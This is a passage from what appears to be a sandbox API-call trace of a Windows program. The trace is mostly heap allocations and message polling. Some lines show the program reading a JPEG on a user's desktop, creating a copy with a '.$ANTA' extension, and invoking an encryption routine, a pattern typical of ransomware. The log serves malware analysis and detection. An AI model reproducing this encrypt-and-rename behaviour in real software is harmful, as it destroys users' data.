(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0121.332] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0121.332] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0121.332] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0121.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0121.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0121.333] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\bbxrq2nhzpp_a.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0121.333] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.333] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0121.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0121.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0121.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0121.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0121.334] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0121.334] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0121.334] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0121.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0121.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392688 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392688 | out: hHeap=0x1780000) returned 1 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0121.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0121.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0121.336] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0121.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0121.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0121.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0121.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0121.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0121.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0121.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0121.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0121.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0121.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0121.336] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\bbxrq2nhzpp_a.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0121.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0121.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0121.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0121.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0121.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0121.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0121.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0121.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0121.904] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0121.905] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0121.905] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0121.905] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0121.905] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0121.905] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0121.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0121.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0121.905] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0121.905] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0121.905] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0121.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0121.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0121.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0121.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0121.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0121.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0121.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0121.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0121.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0121.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0121.913] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0121.913] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0121.916] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x5e76, lpOverlapped=0x0) returned 1 [0121.916] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0121.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0121.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0121.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0121.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0121.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15e76) returned 0x49aa010 [0121.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15e76) returned 0x49bfe90 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0121.920] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15e76) returned 0x49aa010 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0121.920] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0121.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0121.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0121.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0121.921] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392228 [0121.921] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0121.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392228 | out: hHeap=0x1780000) returned 1 [0121.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15e76) returned 0x49aa010 [0121.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0121.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0121.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0121.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0121.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0121.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0121.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0121.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0121.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0121.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0121.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0121.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15e76) returned 0x49d5d10 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0121.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0121.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0121.926] RtlAllocateHeap 